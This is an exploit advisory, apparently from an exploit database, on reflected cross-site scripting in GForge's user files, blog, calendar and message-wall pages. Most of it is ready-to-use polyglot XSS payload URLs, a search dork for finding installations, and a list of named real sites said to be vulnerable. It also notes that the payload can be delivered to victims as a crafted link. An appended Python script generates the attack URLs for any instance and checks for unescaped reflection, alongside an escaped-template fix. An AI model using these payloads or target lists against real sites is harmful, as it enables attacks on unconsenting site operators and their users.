# Exploit Title: GForge Cross Site Scripting
# Date: 30.01.2012
# Author: Sony
# Software Link: http://gforge.org
# Google Dorks: inurl:gf/user/ site:edu (gov, com, org, etc.) or any similar dork (it's simple)
# Web Browser: Mozilla Firefox
# Blog: http://st2tea.blogspot.com
# PoC: http://st2tea.blogspot.com/2012/01/gforge-cross-site-scripting.html
..................................................................

GForge has several interesting reflected XSS issues. They can be tested from an ordinary account; two test accounts are enough. The XSS is in the user files, user blog, user calendar and message wall (user search) pages.

Files. Upload a file at:

http://gforge.org/gf/user/eleo/userfiles/

Press the delete button, open the link in a new window and append the payload to the file_id parameter in the URL:

http://gforge.org/gf/user/eleo/userfiles/my/admin/?action=UserfileDelete&file_id=3089[payload here]

http://gforge.org/gf/user/eleo/userfiles/my/admin/?action=UserfileDelete&file_id=3089%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

Screenshot: http://1.bp.blogspot.com/-ob_5W9q6IOE/TybK50KNkHI/AAAAAAAAAU4/zcX5uwx-FDs/s1600/1234.JPG

Replace "eleo" with your own account name (and the file_id with the id of your own file). Now the blog. Create a post, press the delete button, open the link in a new window and append the payload to the id parameter in the URL:
gf/user/eleo/userblog/my/admin/?action=UserblogDelete&id=2[payload here]

http://gforge.org/gf/user/eleo/userblog/my/admin/?action=UserblogDelete&id=2%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

Screenshots:
http://1.bp.blogspot.com/-blGd0pC1uac/TybNH5m1LRI/AAAAAAAAAVE/X1_7uZTxpJ8/s1600/123454.JPG
http://3.bp.blogspot.com/-QIqH6m6an2E/TybNMwaLUxI/AAAAAAAAAVQ/o439BgL8W2w/s1600/1234556.JPG

Calendar. Open the calendar, press the "add new event" button, then press the delete button, open the link in a new window and append the payload to the start_date parameter in the URL:

http://gforge.org/gf/user/eleo/usercalendar/my/?action=UsercalendarEventDelete&event_id=6&redirect_to=monthview&start_date=1327881600[payload here]

http://gforge.org/gf/user/eleo/usercalendar/my/?action=UsercalendarEventDelete&event_id=6&redirect_to=monthview&start_date=1327881600%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

Screenshot: http://4.bp.blogspot.com/-l2PehXdxhPY/TybOC9eI8bI/AAAAAAAAAVc/dQfmhxCLy1o/s1600/calendar.JPG

There is also XSS in the user search on gf/my/messagewall/:

Screenshots:
http://2.bp.blogspot.com/-7snLqFJ--f0/TybPLb9Un-I/AAAAAAAAAVo/f-z-jsdO1ns/s1600/search_user.JPG
http://3.bp.blogspot.com/-zNZi2myMDLc/TybPOlJUqfI/AAAAAAAAAV0/MTFCewGtziU/s1600/search_users2.JPG

A Google search also shows that many sites run GForge and are vulnerable to this XSS.
Joomlacode.org
Screenshot: http://2.bp.blogspot.com/-BbfJ7fJ20EI/TybQT5U2fYI/AAAAAAAAAWA/RYMoX_VQZUk/s1600/123.JPG

Stanford.edu
Screenshots:
http://3.bp.blogspot.com/-neXykFEhP18/TybQeg0kScI/AAAAAAAAAWM/Wfpn7wAc0OQ/s1600/stan.JPG
http://2.bp.blogspot.com/-7Zwn9dCa_Ms/TybQjpYnq6I/AAAAAAAAAWY/1ZxT_pDJXzE/s1600/stan2.JPG

https://code.ros.org/gf/account/?action=UserAdd
https://forge.si.umich.edu/gf/account/?action=UserAdd
http://media.lbl.gov/gf/account/?action=UserAdd
etc.

This is not a critical vulnerability, but because the payload lives entirely in the URL it can be delivered to other users as a crafted link.
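The three delete-link PoCs above differ only in which page and which parameter the payload is appended to. The script below is an added example (not part of the advisory or of GForge) that builds those test URLs for a given instance and account and checks a fetched response body for the parts of the polyglot that came back unencoded. The two render_* functions are constructed stand-ins for a vulnerable and a fixed template; GForge's own code is not shown on the page, so the attribute context they use is an assumption, and "eleo" and the numeric ids are simply the advisory's own values.

```python
"""Added example: build the advisory's GForge XSS test URLs and check a
response body for unescaped reflection. Not the advisory's or GForge's code."""
import html
import urllib.parse

# Payload exactly as it appears in the advisory's PoC links (URL-encoded).
ENCODED_PAYLOAD = (
    "%27;alert%28String.fromCharCode%2888,83,83%29%29//\\%27;"
    "alert%28String.fromCharCode%2888,83,83%29%29//%22;"
    "alert%28String.fromCharCode%2888,83,83%29%29//\\%22;"
    "alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E"
    "%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E"
)
PAYLOAD = urllib.parse.unquote(ENCODED_PAYLOAD)

# One fragment per context the polyglot tries to break out of: a single-quoted
# JS string, a double-quoted JS string, and plain HTML body/attribute text.
FRAGMENTS = ("';alert(", '";alert(', "<SCRIPT>")

# Pages named in the advisory, relative to /gf/user/<name>/. The numeric ids
# are the advisory's own; use ids belonging to your own test account instead.
ENDPOINTS = {
    "userfiles": "userfiles/my/admin/?action=UserfileDelete&file_id=3089",
    "userblog": "userblog/my/admin/?action=UserblogDelete&id=2",
    "usercalendar": "usercalendar/my/?action=UsercalendarEventDelete"
                    "&event_id=6&redirect_to=monthview&start_date=1327881600",
}


def build_test_urls(base, username):
    """Return {page: url} with the encoded payload appended to the last parameter."""
    base = base.rstrip("/")
    return {page: f"{base}/gf/user/{username}/{path}{ENCODED_PAYLOAD}"
            for page, path in ENDPOINTS.items()}


def unescaped_fragments(body):
    """Return the payload fragments that came back verbatim in a response body.
    An empty list means every context-breaking character was encoded."""
    return [frag for frag in FRAGMENTS if frag in body]


# Constructed stand-in for a template that echoes the parameter raw.
# Assumed context: a link that carries the parameter back to the browser.
def render_vulnerable(param):
    return f'<a href="?action=UserfileDelete&file_id={param}">Confirm delete</a>'


# The same template with the parameter HTML-escaped, quotes included.
def render_fixed(param):
    safe = html.escape(param, quote=True)
    return f'<a href="?action=UserfileDelete&file_id={safe}">Confirm delete</a>'


if __name__ == "__main__":
    for page, url in build_test_urls("http://gforge.org", "eleo").items():
        print(page, url)
    print("vulnerable:", unescaped_fragments(render_vulnerable(PAYLOAD)))
    print("fixed:     ", unescaped_fragments(render_fixed(PAYLOAD)))
```

To test a real instance, fetch each URL from build_test_urls while logged in as your own test account (curl with your session cookie is enough) and pass the body to unescaped_fragments; anything it returns is a context the server failed to encode. Note that html.escape is the right fix only for the HTML-attribute context assumed here; where a parameter is written into a JavaScript string, it needs a JavaScript/JSON encoder instead, which is exactly why the advisory's payload bundles several break-out sequences into one string.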